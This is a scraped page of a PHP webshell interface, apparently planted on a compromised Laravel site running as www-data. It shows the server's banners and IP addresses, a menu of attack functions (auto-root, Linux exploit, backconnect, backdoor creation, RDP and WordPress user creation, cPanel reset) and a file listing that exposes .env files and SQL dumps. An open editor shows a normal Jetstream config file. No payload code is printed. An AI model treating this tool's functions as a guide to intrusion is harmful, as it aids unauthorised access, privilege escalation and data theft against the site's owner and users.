Linux lionsclub 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.29 (Ubuntu)
: 161.35.52.75 | : 3.137.216.202
Cant Read [ /etc/named.conf ]
7.4.28
www-data
shells.trxsecurity.org
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
Backdoor Scanner
Backdoor Create
Alfa Webshell
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
lionsclub /
core /
storage /
[ HOME SHELL ]
Name
Size
Permission
Action
app
[ DIR ]
drwxrwxrwx
framework
[ DIR ]
drwxrwxrwx
logs
[ DIR ]
drwxrwxrwx
.DS_Store
18
KB
-rwxrwxrwx
.editorconfig
220
B
-rw-r--r--
.env
1.48
KB
-rw-r--r--
.env-20250224010527.example
782
B
-rw-r--r--
.env-20250224050941.example
782
B
-rw-r--r--
.env.example
782
B
-rw-r--r--
.gitattributes
111
B
-rw-r--r--
.gitignore
163
B
-rw-r--r--
.htaccess
240
B
-rw-r--r--
.styleci-20250224012800-202502...
174
B
-rw-r--r--
.styleci-20250224012800.yml
174
B
-rw-r--r--
.styleci-20250224050819.yml
174
B
-rw-r--r--
.styleci.yml
174
B
-rw-r--r--
-20250224003034-20250224060407...
6
KB
-rw-r--r--
-20250224003034.DS_Store
6
KB
-rw-r--r--
-20250224011943.gitignore
163
B
-rw-r--r--
-20250224013400.gitattributes
111
B
-rw-r--r--
-20250224020702.editorconfig
220
B
-rw-r--r--
-20250224050836.DS_Store
18
KB
-rw-r--r--
-20250224053319.gitignore
163
B
-rw-r--r--
-20250224054142.editorconfig
220
B
-rw-r--r--
CreatesApplication.php
380
B
-rw-r--r--
FETCH_HEAD
511
B
-rw-r--r--
HEAD
21
B
-rw-r--r--
README-20250224060308.md
9.77
KB
-rw-r--r--
README.md
9.77
KB
-rw-r--r--
_installed
66
B
-rwxrwxrwx
_installed-20250224004340-2025...
66
B
-rw-r--r--
_installed-20250224004340.
66
B
-rw-r--r--
api.php
570
B
-rw-r--r--
app.php
1.58
KB
-rw-r--r--
artisan
1.65
KB
-rw-r--r--
auth.php
3.71
KB
-rw-r--r--
captcha.php
154
B
-rw-r--r--
composer-20250224021744.json
1.96
KB
-rw-r--r--
composer.json
1.96
KB
-rw-r--r--
console.php
592
B
-rw-r--r--
cors.php
823
B
-rw-r--r--
dashboard.php
19.85
KB
-rw-r--r--
database.php
5
KB
-rw-r--r--
description
73
B
-rw-r--r--
fortify.php
3.04
KB
-rw-r--r--
geoip.php
4.78
KB
-rw-r--r--
hashing.php
1.53
KB
-rw-r--r--
installed
66
B
-rwxrwxrwx
installed-20250224004540.
66
B
-rw-r--r--
installed-20250224050828.
66
B
-rw-r--r--
installer.php
4.95
KB
-rw-r--r--
jetstream.php
1.03
KB
-rw-r--r--
mail.php
3.29
KB
-rw-r--r--
output_file-20250224073057.sql
3.55
MB
-rw-r--r--
output_file.sql
3.55
MB
-rw-r--r--
package-20250224010301.json
1.1
KB
-rw-r--r--
package-lock.json
469.75
KB
-rw-r--r--
package.json
1.1
KB
-rw-r--r--
phpunit-20250224063400.xml
1.17
KB
-rw-r--r--
phpunit.xml
1.17
KB
-rw-r--r--
queue.php
2.7
KB
-rw-r--r--
server-20250224061543.php
563
B
-rw-r--r--
server.php
563
B
-rw-r--r--
services.php
2.01
KB
-rw-r--r--
session.php
6.88
KB
-rw-r--r--
tailwind.config-20250224010438...
454
B
-rw-r--r--
tailwind.config-20250224050046...
454
B
-rw-r--r--
tailwind.config.js
454
B
-rw-r--r--
view.php
1.03
KB
-rw-r--r--
web.php
8.09
KB
-rw-r--r--
webpack.mix-20250224011915.js
598
B
-rw-r--r--
webpack.mix.js
598
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : jetstream.php
<?php use Laravel\Jetstream\Features; return [ /* |-------------------------------------------------------------------------- | Jetstream Stack |-------------------------------------------------------------------------- | | This configuration value informs Jetstream which "stack" you will be | using for your application. In general, this value is set for you | during installation and will not need to be changed after that. | */ 'stack' => 'livewire', /* |-------------------------------------------------------------------------- | Features |-------------------------------------------------------------------------- | | Some of Jetstream's features are optional. You may disable the features | by removing them from this array. You're free to only remove some of | these features or you can even remove all of these if you need to. | */ 'features' => [ Features::profilePhotos(), Features::api(), // Features::teams(), ], ];
Close